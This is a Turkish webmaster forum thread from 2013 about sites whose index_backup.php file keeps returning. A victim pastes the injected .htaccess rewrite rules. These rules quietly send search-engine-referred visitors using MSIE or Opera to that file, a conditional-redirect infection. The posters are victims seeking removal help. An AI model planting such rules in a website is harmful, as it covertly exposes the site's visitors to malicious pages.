Tüm Sitelerime Virüs Bulaşmış

26-05-2013, 13:51:46

birkan2096

Kısa bir süre önce abim askere gitti ve tüm siteleri idare etmem için bana bıraktı. Fakat hosting'e virüs girmiş sanırım tüm sitelerin içerisinde index.php dosyalarının yanında birer tane index_backup.php isimli virüs dosyası çıkıyor virüsü siliyorum tekrardan çıkıyor bilgisayarıma format attım yine sildim fakat hala düzelmedi. Bu sebepten dolayı da google'dan siteme gelmek isteyenlere bu site virüslüdür uyarısı veriyor o index_backup.php dosyasını silince düzeliyor fakat aynı gün içerisinde tekrar geri geliyor.

Bu virüsü nasıl temizliyebilirim

26-05-2013, 19:41:16

#2

Taspinardizayn

index_backup'un içeriğini bilmeden virüs diyemeyiz. Belkide kullandığınız hosting şirketi index'inizin yedeğini alıyordur

06-06-2013, 16:59:16

#3

frtkrkc

Kimlik doğrulama veya yönetimden onay bekliyor.

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|yandex|ya|baidu|youtube|wikip edia|qq|excite|altavista|msn|netscape|aol|hotbot|g oto|infoseek|mamma|alltheweb|lycos|search|metacraw ler|bing|dogpile|facebook|twitter|blog|live|myspac e|linkedin|flickr|filesearch|yell|openstat|metabot |gigablast|entireweb|amfibi|dmoz|yippy|walhello|we bcrawler|jayde|findwhat|teoma|euroseek|wisenut|abo ut|thunderstone|ixquick|terra|lookle|metaeureka|se archspot|slider|topseven|allthesites|libero|clicke y|galaxy|brainysearch|pocketflier|verygoodsearch|b ellnet|freenet|fireball|flemiro|suchbot|acoon|deva ro|fastbot|netzindex|abacho|allesklar|suchnase|sch nellsuche|sharelook|sucharchiv|suchbiene|suchmasch ine|infospace|web|websuche|witch|wolong|oekoportal |freenet|arcor|alexana|tiscali|kataweb|voila|sfr|s tartpagina|kpnvandaag|ilse|wanadoo|telfort|hispavi sta|passagen|spray|eniro|telia|bluewin|sympatico|n lsearch|atsearch|klammeraffe|sharelook|suchknecht| ebay|abizdirectory|alltheuk|bhanvad|daffodil|click 4choice|exalead|findelio|gasta|gimpsy|globalsearch directory|hotfrog|jobrapido|kingdomseek|mojeek|sea rchers|simplyhired|splut|thisisouryear|ukkey|uwe|f riendsreunited|jaan|qp|rtl|apollo7|bricabrac|findl oo|kobala|limier|express|bestireland|browseireland |finditireland|iesearch|kompass|startsiden|confex| finnalle|gulesider|keyweb|finnfirma|kvasir|savio|s ol|startsiden|allpages|america|botw|chapu|claymont |clickz|clush|ehow|findhow|icq|westaustraliaonline )\.(.*)
RewriteCond %{HTTP_USER_AGENT} ^.*(msie|opera) [NC]
RewriteCond %{REQUEST_FILENAME} !/index_backup.php
RewriteRule (.*) /index_backup.php?query=$1 [QSA,L]
</IfModule>

--R10.NET; Flood Engellendi -->-> Yeni yazılan mesaj 16:59:16 -->-> Daha önceki mesaj 16:58:43 --

Bu gönderdiğim kodu ekliyor .htaccess dosyasına... o yüzden virüs denmiş, sorunu çözen var mı?

06-06-2013, 17:01:21

#4

~~ugur1502~~

Üyeliği durduruldu

birkan2096 adlı üyeden alıntı: mesajı görüntüle

Kısa bir süre önce abim askere gitti ve tüm siteleri idare etmem için bana bıraktı. Fakat hosting'e virüs girmiş sanırım tüm sitelerin içerisinde index.php dosyalarının yanında birer tane index_backup.php isimli virüs dosyası çıkıyor virüsü siliyorum tekrardan çıkıyor bilgisayarıma format attım yine sildim fakat hala düzelmedi. Bu sebepten dolayı da google'dan siteme gelmek isteyenlere bu site virüslüdür uyarısı veriyor o index_backup.php dosyasını silince düzeliyor fakat aynı gün içerisinde tekrar geri geliyor.

Bu virüsü nasıl temizliyebilirim

frtkrkc adlı üyeden alıntı: mesajı görüntüle

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|yandex|ya|baidu|youtube|wikip edia|qq|excite|altavista|msn|netscape|aol|hotbot|g oto|infoseek|mamma|alltheweb|lycos|search|metacraw ler|bing|dogpile|facebook|twitter|blog|live|myspac e|linkedin|flickr|filesearch|yell|openstat|metabot |gigablast|entireweb|amfibi|dmoz|yippy|walhello|we bcrawler|jayde|findwhat|teoma|euroseek|wisenut|abo ut|thunderstone|ixquick|terra|lookle|metaeureka|se archspot|slider|topseven|allthesites|libero|clicke y|galaxy|brainysearch|pocketflier|verygoodsearch|b ellnet|freenet|fireball|flemiro|suchbot|acoon|deva ro|fastbot|netzindex|abacho|allesklar|suchnase|sch nellsuche|sharelook|sucharchiv|suchbiene|suchmasch ine|infospace|web|websuche|witch|wolong|oekoportal |freenet|arcor|alexana|tiscali|kataweb|voila|sfr|s tartpagina|kpnvandaag|ilse|wanadoo|telfort|hispavi sta|passagen|spray|eniro|telia|bluewin|sympatico|n lsearch|atsearch|klammeraffe|sharelook|suchknecht| ebay|abizdirectory|alltheuk|bhanvad|daffodil|click 4choice|exalead|findelio|gasta|gimpsy|globalsearch directory|hotfrog|jobrapido|kingdomseek|mojeek|sea rchers|simplyhired|splut|thisisouryear|ukkey|uwe|f riendsreunited|jaan|qp|rtl|apollo7|bricabrac|findl oo|kobala|limier|express|bestireland|browseireland |finditireland|iesearch|kompass|startsiden|confex| finnalle|gulesider|keyweb|finnfirma|kvasir|savio|s ol|startsiden|allpages|america|botw|chapu|claymont |clickz|clush|ehow|findhow|icq|westaustraliaonline )\.(.*)
RewriteCond %{HTTP_USER_AGENT} ^.*(msie|opera) [NC]
RewriteCond %{REQUEST_FILENAME} !/index_backup.php
RewriteRule (.*) /index_backup.php?query=$1 [QSA,L]
</IfModule>

--R10.NET; Flood Engellendi -->-> Yeni yazılan mesaj 16:59:16 -->-> Daha önceki mesaj 16:58:43 --

Bu gönderdiğim kodu ekliyor .htaccess dosyasına... o yüzden virüs denmiş, sorunu çözen var mı?

https://www.r10.net/is-arayanlar/9900...giderilir.html

Linke bi göz atın ücretli yardım isterseniz. Toplu işte indirim yapabilirim. Tekrar bulaşma durumunda da para almam. Scriptinizin wp olup, olmaması önemli değildir...

02-07-2013, 11:38:47

#5

frtkrkc

Sorunu çözemedim ama şu an htaccess e yazma işlemi yapmıyor. Yetkileri sıfırlayıp index_backup.php yi kendim oluşturdum, şu an canavar. Kendi oluşturduğu dosyaları silince sıkıntı kalmıyor. Bilginize.

02-07-2013, 17:22:40

#6

RTC

Kimlik doğrulama veya yönetimden onay bekliyor.

Benim de başıma gelmişti. Şifreyi değiştirdim, dosyaları temizledim düzeldi.

02-07-2013, 21:17:10

#7

muh4mmet

Eğer dilerseniz bir bakarız...